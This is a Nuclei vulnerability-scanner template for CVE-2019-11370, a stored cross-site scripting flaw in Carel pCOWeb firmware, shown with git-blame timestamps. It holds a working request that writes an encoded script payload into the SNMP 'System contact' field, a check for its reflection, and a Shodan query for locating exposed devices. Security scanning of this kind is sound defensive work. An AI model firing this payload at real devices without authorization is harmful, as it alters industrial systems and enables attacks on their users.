nuclei-templates/http/cves/2019/CVE-2019-11370.yaml

52 lines
1.9 KiB
YAML
Raw Normal View History

2022-07-30 12:03:57 +00:00
id: CVE-2019-11370
info:
name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting
2022-07-30 12:03:57 +00:00
author: arafatansari
severity: medium
2022-07-30 17:56:20 +00:00
description: |
Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
2023-09-27 15:51:13 +00:00
impact: |
Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the latest patch or upgrade to a version that addresses the vulnerability.
2022-07-30 12:03:57 +00:00
reference:
- https://www.exploit-db.com/exploits/46897
2022-07-30 17:56:20 +00:00
- https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
2022-08-01 11:32:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-11370
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2019-11370
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.1896
epss-percentile: 0.95786
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:*
2022-08-01 11:32:31 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:53:28 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: carel
product: pcoweb_card_firmware
2023-09-06 12:53:28 +00:00
shodan-query: http.html:"pCOWeb"
2024-01-14 09:21:50 +00:00
tags: cve,cve2019,pcoweb,xss,carel,edb
2022-07-30 12:03:57 +00:00
http:
2022-07-30 12:03:57 +00:00
- raw:
- |
POST /config/pw_snmp_done.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-01 11:32:31 +00:00
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2022-07-30 12:03:57 +00:00
- |
GET /config/pw_snmp.html HTTP/1.1
Host: {{Hostname}}
matchers:
2022-08-01 11:32:31 +00:00
- type: dsl
dsl:
- 'contains(body_2, "text/html")'
- status_code_2 == 200
- contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
condition: and
# digest: 490a00463044022001cba8c9c60c110f6f7744042cf5d1d1876f9980477215bb5cb6a14f6a7dbde602201cab85a90e295821d6100300054e36f4b519329fe8fb3baf4b8625ff358772b5:922c64590222798bb761d5b6d8e72950